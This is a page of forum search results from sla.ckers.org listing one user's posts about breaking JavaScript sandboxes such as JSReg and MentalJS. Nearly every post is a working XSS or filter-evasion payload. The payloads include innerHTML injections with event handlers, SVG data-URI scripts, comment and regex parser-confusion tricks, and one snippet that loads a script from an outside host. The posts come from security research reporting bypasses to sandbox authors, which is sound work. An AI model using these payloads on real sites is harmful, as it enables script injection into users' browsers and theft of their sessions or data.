Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Pages: 12345...LastNext
Current Page: 1 of 6
Results 1 - 30 of 170
8 months ago
LeverOne
I'm starting to test the ruleset. --- Test cases: 0: { // arraycomma 0: 1, // arraycomma + 1: 1, // arr open + 2: 1, // arr close + 3: 1, // AccessorOpen ? 4: 1, // AccessorClose + 14: 1, // Break ? 15: 1, //
Forum: XSS Info
1 year ago
LeverOne
@d0znpp MentalJS designed to work in IE9+ standards mode.
Forum: XSS Info
1 year ago
LeverOne
1) IE,FF document.body.innerHTML="<script> </script>"; x=document.getElementsByTagName('script')[2].cloneNode(); x.setAttribute('src', 'http://ha.ckers.org/xss.js'); document.body.insertBefore(x,document.body.firstChild); bugs: 1) "There is no native insertAfter method." // 2) if(!allowedTagsRegEx.test(elementNode.nodeName)) {
Forum: XSS Info
1 year ago
LeverOne
document.body.innerHTML="<form onmouseover=alert(location)><input name=attributes>"; // for the third time :)
Forum: XSS Info
1 year ago
LeverOne
FF, IE document.body.innerHTML='<script> </script>'; x=document.getElementsByTagName('script')[2].cloneNode(); x.appendChild(document.createTextNode('1')); x.appendChild(document.createTextNode('/alert(location)/+0')); document.body.appendChild(x); bugs: 1) if(this.parentNode) { // parentNode may not exist f.e.: document.createElement('div').innerHTML='<script>1
Forum: XSS Info
1 year ago
LeverOne
I start looking already at the weekend.
Forum: XSS Info
1 year ago
LeverOne
1) document.body.innerHTML="<form onmouseover=alert(location) name=body><input>"; 2) FF x=document.createElement('script'); x.innerHTML='{alert(location)}'; x.appendChild(document.createTextNode('+1')); document.body.appendChild(x); 3) !FF // SVGScriptElement document.body.innerHTML="<svg><script></script></svg>"; x=documen
Forum: XSS Info
1 year ago
LeverOne
1) IE 9 document.body.innerHTML='<lo xmlns="><img src=x:xx onerror=alert(location)//"></lo>'; 2) (repetition) document.body.innerHTML="<form onmouseover=alert(location)><input name=attributes>"; 3) Opera document.body.innerHTML="<svg><image></image><style><!-- or any other elements -->image{filter:url
Forum: XSS Info
1 year ago
LeverOne
document.body.innerHTML="<svg><image></image><style></style></svg>"; document.getElementsByTagName('style')[1].textContent='image{filter:url(\'data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E\')}'; A similar can be done via innerText + -o-link
Forum: XSS Info
1 year ago
LeverOne
document.body.innerHTML="<form onmouseover=alert(1)><input name=attributes>"; Opera document.body.innerHTML="<svg><image></image><style>image{filter:url('data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E')}</style></svg>"; IE9 (element.attributes
Forum: XSS Info
1 year ago
LeverOne
eval("1..lo\u2028in\u2028function\u2028()/'/;alert(location)//'"); old problems...
Forum: XSS Info
1 year ago
LeverOne
// not an attack on the technique I agree and I have a very good first impression of the new parser. 1<!--0[0];for(1 function lo(){}/alert(location)/+0<!--0[0];); 01.E+/-0;lo='/+alert(location)//' 07.in/alert(location)/+0
Forum: XSS Info
1 year ago
LeverOne
for(;0;)break typeof/lo;alert(location)/+0 also continue + new, throw, delete, typeof
Forum: XSS Info
1 year ago
LeverOne
1<!--0[0];for(var lo {}/alert(location,i=0)/i<!--lo;);
Forum: XSS Info
2 years ago
LeverOne
function lo(){i// in/1};alert(location)//1} // !Opera var y=function(){},lo // !FF /'/,alert(location)//' this function lo(){}/'/,alert(location)//' var NaN /'/,alert(location)//' // !FF Tests: var i=i /i/i,a var x (x)=123,x /i/i var i {}
Forum: XSS Info
2 years ago
LeverOne
// I consider you an owner of this project Thanks, but I cann't agree, because I know I'll not be doing commits. Choose a license on your own, please. // have you considered releasing a js parser test suite :) In my opinion it's more fun, when "a lot of other parsers have problems". // add me on gtalk I don't use gtalk.
Forum: XSS Info
2 years ago
LeverOne
// Any reason you need it there? I often compare the version to exactly understand how the problem has been fixed. Sometimes I add my code to see how the input data is overwritten. Sometimes I leave in the code my notes to remember in the future. // You might want to wait until I fix a lot of things ОК. I see the var statement fix was not complete. I follow this thread.
Forum: XSS Info
2 years ago
LeverOne
Thank you! Soon I will look in detail at the new sandbox. At the moment I have three suggestions: 1. Run hack test on Opera or GC. 2. Do something with "<!--" and "-->". 3. Upload MentalJS on googlecode.
Forum: XSS Info
2 years ago
LeverOne
@Gareth Heyes I added it to the description for #9 few days ago and your link to hackvertor.
Forum: XSS Info
2 years ago
LeverOne
Perhaps it will be useful for you: 1) http://html5sec.org/#9 2) http://html5sec.org/#90 3) http://html5sec.org/#129
Forum: XSS Info
2 years ago
LeverOne
In this post I will list all incorrect changes in the original code (syntactic violations), which exist in the current version of the JSReg. You can edit this post. 1) this['f$oo']=1;'$f'+'oo' in this; // here must take into account the priority of operations 2) switch(1){case 1:{} // <-- should be parsed as a block. } 3) switch(1){default:{} // <-- should be parsed as
Forum: XSS Info
2 years ago
LeverOne
if(1)/**/{}/'//*'+function{1:lo}/'/,alert(parent.location))//*/-/'/ lo='@mozilla.org/js/function'; 1<!--0[0];alert(lo: :['location']); `if(1)/**/` and `<!--` are just some of the options to hide the wrong code at the stage of initial syntax checking. For this purpose can be used most of the violations listed in the next post.
Forum: XSS Info
2 years ago
LeverOne
// 109 function(a,b,c,d,e){for(d=e='';a||(b='=',d%1);e+=b[63&c>>8-d%1*8])c=c<<8|a.charCodeAt(d-=-.75);return e}
Forum: Obfuscation
2 years ago
LeverOne
As I said above, I'll return to JSReg in March or April of 2012, I want to finish my look too, but I'm busy.
Forum: XSS Info
3 years ago
LeverOne
0?lo:/='/,alert(parent.location)//' switch(1){case 1:{}/'lo/,alert(parent.location)}//'} // default:{} <-- the same bugs: 1. i=1;i++ {} 2. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#612 3. ~{} ---- // I stopped to think about it, but the ideas still come to me. Preventing future bypasses via unsupported statements. When browsers will implement
Forum: XSS Info
3 years ago
LeverOne
0?/='lo/i:alert(parent.location)//'
Forum: XSS Info
3 years ago
LeverOne
1?{}:/='lo/,alert(parent.location)//' ~{x:/='/,lo:alert(parent.location)}//'
Forum: XSS Info
3 years ago
LeverOne
I suggest to add these non-FF spaces \u202f, \u205f to spaceChars regex and do something with literal characters \u1680,\u180e,\u0085 (spaces in IE6-8) and \u0000,\ufffe \ufeff during normalization. bugs: 1. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#196 2. variable regex has an invalid structure: /(?:[^\x00-\x7f[ \f\n\r\u000b\u2028\u2029]+... 3. this['f$oo']=1
Forum: XSS Info
3 years ago
LeverOne
Quote Can you break it? Don't worry, I will tell you, if I can't break it. When I will say I can't break it? No sooner than I will analyze each line of your code. It will be not quickly. IE 6-8 (or those compatibility modes) with({'if':function(){}})if
(1)/'/+/*'+alert(window[//
),('location' ])+/lo*/i Еxplanation: For IE6-8 chars "\u2028" and "\u2029" and o
Forum: XSS Info
3 years ago
LeverOne
QuoteI've decided to add a space after < or > so window<!--window becomes $window$< !--$window$ and window-->window becomes $window$-- >$window$. Any modification to the original code (that changes a syntactic group) w/o syntax check is dangerous. Look: 1<!--)(i Quote Where can you hide that payload now? alert(window)
Forum: XSS Info
Pages: 12345...LastNext
Current Page: 1 of 6